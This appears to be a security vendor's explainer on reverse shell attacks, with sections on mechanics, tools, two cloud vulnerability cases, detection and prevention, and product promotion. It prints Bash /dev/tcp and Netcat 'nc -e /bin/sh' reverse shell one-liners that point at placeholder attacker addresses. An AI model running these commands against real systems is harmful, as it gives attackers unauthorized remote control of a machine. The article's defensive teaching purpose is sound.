What is reverse shell?
Reverse shell attacks create unauthorized remote access by forcing targeted machines to initiate connections back to attacker-controlled systems. This technique bypasses traditional firewall protections because the connection appears as legitimate outbound traffic from the compromised host. Attackers typically use TCP protocols, though ICMP and UDP variants exist for specific scenarios.
With control of a victim's machine and communications, the attacker can steal or modify data, inject malware, or further escalate their access within the victim's network. This is a widespread threat, with government agencies reporting activity across multiple countries, including the US, UK, Canada, and Australia. And the stakes are high: public disclosure of the attack can lead to loss of customer trust, negative media attention, diminished brand reputation, regulatory fines, and revenue loss.
Get the Wiz Research Guide to MCP Security
A practical breakdown of the security risks in the Model Context Protocol, from supply chain vulnerabilities and prompt injection to remote server exposure.
How does reverse shell work?
Reverse shell attacks exploit command injection vulnerabilities. The attack unfolds through three distinct phases that transform initial access into persistent control: connection initiation, reverse shell, and command injection.
Connection initiation. Attackers compromise target systems by remote code execution that exploits system vulnerabilities, like port forwarding and open ports. Because firewall rules are easier to bypass on open ports, attackers can gain access through ports such as port 80 or 443, which are often open by default.
Reverse shell. Attackers then deploy a payload that establishes a connection from the vulnerable machine to a remote machine. The attacker's remote systems listen and accept the request, allowing them administrative access to exploit victims' systems. Since the connection is outgoing, security mechanisms that detect only incoming connections can be bypassed. (This is an important difference between reverse shell and bind shell. Unlike reverse shell, bind shell may be easier to discover, as the connection is initiated by the attacker's system.)
Command injection. To maintain persistent access, attackers bypass network filtering through port forwarding. Attackers may also use proxy servers or tunneling techniques to obscure the origin of their connection. To conceal malicious communication, attackers use encryption, but this adds an extra handshake to the process, which makes it even harder to detect the communication flow.
What are common reverse shell tools and methods?
Attackers use a range of tools and programming languages to create reverse shells, each with its own strengths and detection challenges. Some of the most common tools include:
Netcat, which is widely used for its simplicity and flexibility
Socat, which supports encrypted connections and advanced tunneling
Attackers also leverage built-in scripting languages like Bash, Python, Perl, PHP, and Ruby to craft custom reverse shell payloads that blend in with legitimate processes.
In Windows environments, PowerShell and cmd.exe are often used to establish reverse shells, sometimes in combination with tools like msfvenom or Metasploit for payload generation. Understanding these tools and methods helps defenders recognize suspicious activity and block common attack paths before they’re exploited.
Examples of reverse shell methods
Multiple programming languages enable reverse shell implementations, each with distinct syntax but similar underlying mechanics. Understanding these variations helps security teams recognize attack patterns across different environments.
Bash reverse shell: Bash reverse shell is a Unix shell that is carried out using a simple one-line command. For example:
```bash
bash -i >& /dev/tcp/attackers_ip/attackers_port 0>&1In this command, “/dev/tcp/attackers_ip/attackers_port” represents the IP address and port number the reverse shell will connect to.
Java reverse shell: Java reverse shells are implemented using libraries such as java.net.Socket. This attack involves establishing a socket connection to the threat actor's server to enable remote command execution.
Netcat reverse shell: A Netcat reverse shell might look like:
nc -e /bin/sh attackers_ip attackers_portIn this command, Netcat executes a shell connection to the specified IP address and port to establish a reverse shell.
Perl reverse shell: The IO::Socket module is commonly used to initiate a Perl reverse shell connection, enabling bidirectional communication between victims' and attackers' systems.
PHP reverse shell: For PHP reverse shells, the attacker uses PHP's socket functions (open and exec) to open a connection from a victim's system to their system. The threat actor then executes commands to redirect communication to their system.
Python reverse shell: Python provides robust networking capabilities, making it well-suited to creating reverse shell connections. A Python reverse shell involves using the "socket" library to create a socket connection.
Ruby reverse shell: A Ruby reverse shell attack involves creating a socket connection to the attacker's server and establishing bidirectional communication for executing commands in a victim's system.
PyLoose: Python-based fileless malware targets cloud workloads to deliver cryptominer
Leia mais
Real-world examples of reverse shell attacks
Supply chain attacks amplify reverse shell impact by targeting shared infrastructure components. Attackers distribute malicious packages disguised as legitimate software updates, automatically triggering reverse shell connections when installed.
Cloud service providers become high-value targets because compromising their systems affects multiple downstream organizations simultaneously. This multiplier effect makes supply chain–based reverse shells particularly dangerous for enterprise environments.
Let's consider two real-life scenarios:
1. #BrokenSesame vulnerability in Alibaba PostgreSQL databases
The Wiz Research team secured backdoor access to two Alibaba cloud PostgreSQL databases: ApsaraDB RDS and AnalyticDB. The backdoor was a container vulnerability, #BrokenSesame, caused by inadequate container isolation and an accidental "write" permission to a private registry.
This access could have allowed threat actors to compromise the Alibaba supply chain, execute "write" operations on customers' registries, and release reverse shell packages disguised as software updates.
2. Hell's Keychain vulnerability in IBM Cloud PostgreSQL databases
The Wiz Research team leveraged a privilege escalation vulnerability named "Hell's Keychain" in IBM's Cloud PostgreSQL database to uncover a set of vulnerabilities that could have allowed attackers to read and modify the data stored in IBM's PostgreSQL databases.
The vulnerabilities included the Kubernetes service account token, the private container registry password, CI/CD server credentials, and overly permissive network access to internal build servers. If exploited, they would have exposed IBM customers to supply-chain attacks. (If this sounds familiar, it's because this is similar to the ExtraReplica vulnerability, where Wiz researchers gained superuser privileges in an Azure PostgreSQL database.)
How to detect reverse shell attacks
Detecting reverse shell attacks requires monitoring for unusual outbound connections, especially those targeting unfamiliar external IP addresses or ports. Security teams should look for processes that spawn network connections unexpectedly, such as shells or scripting engines making outbound TCP connections.
Traditional firewalls fail against reverse shells because these attacks use legitimate outbound connections that appear normal to perimeter security, but additional security measures can help cover your bases:
Advanced firewalls with eBPF capabilities monitor outbound traffic patterns and detect suspicious connection behaviors.
Intrusion detection systems (IDS) complement firewall controls by analyzing traffic content and timing patterns. They identify unusual outbound connections to known malicious infrastructure and alert on command-and-control communication patterns typical of reverse shell activity.
Centralized log analysis and behavioral monitoring can help identify patterns that deviate from normal activity, such as command-line tools running with network privileges or connections initiated from service accounts. Advanced detection solutions, like Wiz Defend, use behavioral analytics to correlate process activity, network flows, and cloud context, making it easier to spot reverse shell attempts even when attackers use encryption or obfuscation techniques.
Watch 5-Minute Demo
See how Wiz Defend detects reverse shell patterns across cloud workloads using behavioral analytics and network monitoring.
How to prevent reverse shell attacks
Preventing reverse shell attacks starts with reducing the attack surface by patching vulnerabilities and limiting unnecessary network exposure:
Enforce least-privilege access for users and applications, and segment networks to restrict outbound connections from sensitive workloads.
Implement regular security audits to identify command injection vulnerabilities before attackers can exploit them.
Use automated scanning tools to detect misconfigurations in web applications, APIs, and network services that commonly serve as entry points.
Establish penetration testing to validate whether these vulnerabilities can be chained together to achieve remote access.
Beyond network controls and access restrictions, your software supply chain demands equal attention. Malicious dependencies have become a favored reverse shell delivery mechanism, just look at recent npm and PyPI attacks where attackers embedded reverse shell payloads in legitimate-looking packages that execute the moment you install them. This threat is compounded by credential exposure: Wiz's State of Code Security Report 2025 found that 61% of organizations have secrets exposed in public repositories, giving attackers the keys they need to amplify supply chain attacks.
This is where software composition analysis (SCA) tools become essential. They scan your dependencies before deployment, identifying both known vulnerabilities and suspicious code patterns that could harbor reverse shells. Prioritize tools that provide vulnerability scoring and integrate seamlessly into your CI/CD pipelines, catching malicious packages before they reach production is far easier than cleaning up after a breach.
Still, don't overlook the fundamentals: patch management directly closes the command injection vulnerabilities that reverse shell attacks exploit. Every unpatched web application, API, or system service is a potential entry point where attackers can inject malicious code. Automated patch deployment shrinks the window between vulnerability disclosure and remediation, giving attackers less time to strike.
Put an attack plan in place
Once an attacker gets a foothold, host-based security controls become your next line of defense. They limit what attackers can actually do once they're in. Container isolation is particularly effective here, as it keeps reverse shell attacks from jumping between containerized applications, essentially quarantining the breach to just the compromised workload. Pair this with allow-lists that specify exactly which destinations your systems can connect to, and keep a close eye on any unauthorized changes to firewall or proxy rules, these are red flags that something's wrong.
Above all, do not underestimate the human element: training your employees to spot phishing and social engineering tactics can stop attacks before they even start. When you combine all these controls with continuous monitoring and automated response capabilities, you're building a defense-in-depth strategy that can catch and stop reverse shell attacks before they spiral out of control.
Protect your organization from reverse shell attacks with Wiz
As reverse shell techniques evolve to exploit supply chains and exposed secrets, traditional defenses aren't enough. Wiz provides a unified, behavior-driven defense by combining real-time eBPF-based runtime monitoring with deep cloud context.
By correlating runtime signals, the Wiz Security Graph filters out the noise, enabling you to automatically block malicious processes or proactively harden your environment through Attack Surface Management (ASM).
Don’t let a hidden vulnerability become an attacker's entry point. Request a demo to see how Wiz can help you secure your environment against reverse shell attacks and other advanced threats.
Watch 5-Minute Demo
See how Wiz Defend detects reverse shell patterns across cloud workloads using behavioral analytics and network monitoring.